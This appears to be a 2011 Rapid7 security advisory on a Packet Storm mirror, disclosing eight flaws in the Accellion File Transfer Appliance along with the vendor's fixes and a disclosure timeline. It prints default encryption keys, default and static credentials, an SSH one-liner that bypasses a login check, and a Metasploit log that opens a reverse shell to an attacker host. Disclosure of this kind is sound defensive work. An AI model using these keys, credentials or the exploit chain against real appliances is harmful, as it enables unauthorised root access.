Accellion File Transfer Appliance Multiple Vulnerabilities

2011-02-07T00:00:00
ID PACKETSTORM:98249
Type packetstorm
Reporter H D Moore
Modified 2011-02-07T00:00:00

Description

                                        
                                            `R7-0039: Accellion File Transfer Appliance Multiple Vulnerabilities  
February 7, 2011  
  
-- Vulnerability Details:  
  
The Accellion File Transfer Appliance, prior to version FTA_8_0_562,  
suffers from a number of security flaws that can lead to a remote root  
compromise.  
  
  
1. Message Routing Daemon Default Encryption Keys  
  
The appliance ships with UDP port 8812 allowed through the firewall. The  
port correlates to an internal service that routes messages between  
backend processes. To authenticate access to this service, all messages  
must be encrypted with a secret key using the blowfish algorithm. The  
appliance ships with two default keys, neither of which is random, which  
results in an attacker being able to communicate with the internal  
processes of the appliance and perform administration tasks on the  
appliance itself. These two default keys are  
123456789ABCDEF0123456789ABCDEF0 and 0123456789ABCDEF0123456789ABCDEF,  
which are expanded with MD5 to create 448-bit blowfish keys.  
  
  
2. MatchRep Daemon insert_plugin_meta_info() Command Injection  
  
One of the applications that is exposed through the port 8812 message  
routing service executes a system command without sanitizing the  
arguments provided by the requesting application. This allows arbitrary  
commands to be executed on the appliance. Combined with Issue #1, this  
allows remote, unauthenticated command execution on the appliance as the  
"soggycat" user, which is root equivalent (sudo rights). Rapid7 has  
developed a Metasploit module[***] to chain these vulnerabilities and  
will release this module in early March.  
  
  
3. Remote Administration TTY Check Bypass  
  
The appliance ships with a default login of admin/accellion. To reduce  
the risk of remote attack, this account is not allowed to login over  
Secure Shell. The implementation of this security check has a flaw and  
it is still possible to configure an out-of-box Accellion appliance  
remotely through SSH, simply by executing a shell without a TTY: (ssh  
admin@target 'sh')  
  
  
4. Static Passwords for Privileged User Accounts  
  
The secure shell daemon is running by default and the system is  
configured with static passwords for a number of root-equivalent  
accounts. It is possible to crack these passwords and gain access to any  
Accellion system with the secure shell daemon exposed. The scope of our  
research did not provide time to crack these passwords, but it’s a just  
a question of resource allocation. These accounts include  
"soggycat","sdadmin", and the "root" user account itself.  
  
  
5. Remote Access via Stale SSH Authorized Keys  
  
The "soggycat" user account has a static password, as mentioned  
previously, but also has two SSH keys configured for passwordless login.  
These keys were generated over eight years ago and should have been  
changed to reduce the risk of exposure. The comments of these two keys  
are worrying as well:  
  
[root@fta soggycat]# grep -i comment .ssh2/*.pub  
.ssh2/theone.pub:Comment: "i am going to kiiiiiiiiiiiiill you"  
.ssh2/thetwo.pub:Comment: "1024-bit dsa, kelvin@admin.c1s1.net, Mon Feb  
25 2002 05:31:0  
  
  
6. Weak MySQL Password for "root" Account  
  
This issue is not exploitable by default due to firewall configuration  
of the appliance, but it points to larger problems with the design of  
the system. The root password for the MySQL server is simply "hawksql"  
and all users of the system are able to read this password within  
various configuration files. At the least, a non-root MySQL user account  
should be used to reduce the risk of attack due to SQL Injection flaws  
in the rest of the application.  
  
  
7. Internal Daemons not Bound to Loopback Interface  
  
This issue is not exploitable by default due to firewall configuration  
of the appliance. All internal services communicate through UDP services  
bound to the 0.0.0.0 address. This exposes the internal workings of the  
appliance to an attacker with network access to the system. For example,  
a local user account without administrative rights would still be able  
to escalate privileges by communicating with these internal services.  
  
  
8. Rsync Daemon Allows Access to Privileged User Home Directory  
  
This issue is not exploitable by default due to firewall configuration  
of the appliance. The rsync daemon allows read/write access to the  
"soggycat" home directory. Since this user account is root-equivalent,  
any attacker than talk to the rsync daemon can take full control of the  
appliance.  
  
  
*** Information from the Metasploit module combining issues #1 and #2,  
to be released in early March of 2011.  
  
  
Description:  
This module exploits a chain of vulnerabilities in the Accellion  
File Transfer appliance. This appliance exposes a UDP service on  
port 8812 that acts as a gateway to the internal communication bus.  
This service uses Blowfish encryption for authentication, but the  
appliance ships with two easy to guess default authentication keys.  
This module abuses the known default encryption keys to inject a  
message into the communication bus. In order to execute arbitrary  
commands on the remote appliance, a message is injected into the bus  
destined for the 'matchrep' service. This service exposes a function  
named 'insert_plugin_meta_info' which is vulnerable to an input  
validation flaw in a call to system(). This provides access to the  
'soggycat' user account, which has sudo privileges to run the  
primary admin tool as root.  
  
msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151  
msf exploit(accellion_fta_mpipe2) > exploit  
  
[*] Started reverse handler on 192.168.198.135:4444  
[*] Command shell session 1 opened (192.168.198.135:4444 ->  
192.168.198.151:42239) at 2010-11-15 23:50:35 -0600  
  
id  
uid=520(soggycat) gid=99(nobody) groups=99(nobody)  
  
  
  
-- Vendor Response:  
  
Accellion addressed item #3 on December 21st, 2010 with update FTA_8_0_540  
  
Accellion addressed items #1, #2, #4, #5, #6, and #7 on January 17th,  
2011 with update FTA_8_0_562  
  
Item #8 is not exploitable in the default configuration and Accellion  
recommends the use of SSL VPN when configuring a trusted link between  
two appliances.  
  
Official Changelog for FTA_8_0_562:  
  
The update randomizes the following on the Accellion setup - Accellion  
remote management user password, the system mysql password and the keys  
used for encrypting inter-appliance communication. All internal Daemons  
are now bound to Loopback Interface. The update also removes an unused  
SSH key meant for remote troubleshooting login. These fixes are in  
response to a security scan done by Rapid7.  
  
  
-- Disclosure Timeline:  
2010-10-21 - Issue #3 was reported to Accellion  
2010-12-06 - Issues #1, #2, #4, #5, #6, #7, #8 reported to Accellion  
2010-12-20 - A reminder the Rapid7 policy was sent to Accellion  
2010-12-21 - Accellion responds with a fix date of January 2011  
2010-12-21 - Accellion releases FTA_8_0_540 to address #3  
2011-01-17 - Accellion releases FTA_8_0_562 to address remaining items  
2011-02-07 - Detailed advisory released by Rapid7  
  
  
-- Credit:  
This vulnerability was discovered by HD Moore  
  
  
-- About Rapid7 Security  
Rapid7 provides vulnerability management, compliance and penetration  
testing solutions for Web application, network and database security. In  
addition to developing the NeXpose Vulnerability Management system,  
Rapid7 manages the Metasploit Project and is the primary sponsor of the  
W3AF web assessment tool.  
  
Our vulnerability disclosure policy is available online at:  
  
http://www.rapid7.com/disclosure.jsp  
  
  
`